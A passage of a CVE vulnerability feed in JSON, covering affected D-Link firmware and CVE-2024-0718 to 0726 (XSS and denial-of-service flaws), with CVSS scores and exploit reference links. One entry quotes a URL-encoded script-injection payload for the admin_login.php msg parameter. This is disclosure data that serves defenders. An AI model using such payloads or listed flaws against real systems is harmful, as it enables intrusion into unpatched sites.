"cpe:2.3:o:dlink:dir-815\\/ac_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-815\\/ac:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dsl-224_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dsl-224:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dwm-321_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dwm-321:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-x1860_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-x1860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dap-1360_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dap-1360:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-820_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-820:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-843_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-843:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dvg-5402g\\/gfru_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dvg-5402g\\/gfru:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dwr-953_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dwr-953:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dvg-n5402g\\/il_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dvg-n5402g\\/il:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-825ac_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-825ac:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-620s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-620s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dvg-n5402g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dvg-n5402g:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dsl-2750u_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dsl-2750u:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-615gf_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-615gf:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-816_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-19T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0718", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md", "name" : "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md", "name" : "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251543", "name" : "https://vuldb.com/?ctiid.251543", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251543", "name" : "https://vuldb.com/?ctiid.251543", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251543", "name" : "https://vuldb.com/?id.251543", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251543", "name" : "https://vuldb.com/?id.251543", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:liuwy-dlsdys:zhglxt:4.7.7:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0719", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/", "name" : "https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/", "name" : "https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:otwthemes:tabs_shortcode_and_widget:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.17", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-13T00:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0720", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link", "name" : "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link", "name" : "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720", "name" : "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720", "name" : "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?ctiid.251544", "name" : "https://vuldb.com/?ctiid.251544", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251544", "name" : "https://vuldb.com/?ctiid.251544", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251544", "name" : "https://vuldb.com/?id.251544", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251544", "name" : "https://vuldb.com/?id.251544", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:factominer:factoinvestigate:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0721", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251545", "name" : "https://vuldb.com/?ctiid.251545", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251545", "name" : "https://vuldb.com/?ctiid.251545", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251545", "name" : "https://vuldb.com/?id.251545", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251545", "name" : "https://vuldb.com/?id.251545", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jspxcms:jspxcms:10.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0722", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link", "name" : "https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link", "name" : "https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251546", "name" : "https://vuldb.com/?ctiid.251546", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251546", "name" : "https://vuldb.com/?ctiid.251546", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251546", "name" : "https://vuldb.com/?id.251546", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251546", "name" : "https://vuldb.com/?id.251546", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:social_networking_site:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0723", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-404" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251547", "name" : "https://vuldb.com/?ctiid.251547", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251547", "name" : "https://vuldb.com/?ctiid.251547", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251547", "name" : "https://vuldb.com/?id.251547", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251547", "name" : "https://vuldb.com/?id.251547", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:freesshd:freesshd:1.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0725", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-404" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251548", "name" : "https://vuldb.com/?ctiid.251548", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251548", "name" : "https://vuldb.com/?ctiid.251548", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251548", "name" : "https://vuldb.com/?id.251548", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251548", "name" : "https://vuldb.com/?id.251548", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:prosshd:prosshd:1.2_20090726:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0726", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4", "name" : "https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4", "name" : "https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251549", "name" : "https://vuldb.com/?ctiid.251549", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251549", "name" : "https://vuldb.com/?ctiid.251549", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251549", "name" : "https://vuldb.com/?id.251549", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251549", "name" : "https://vuldb.com/?id.251549", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:student_project_allocation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : 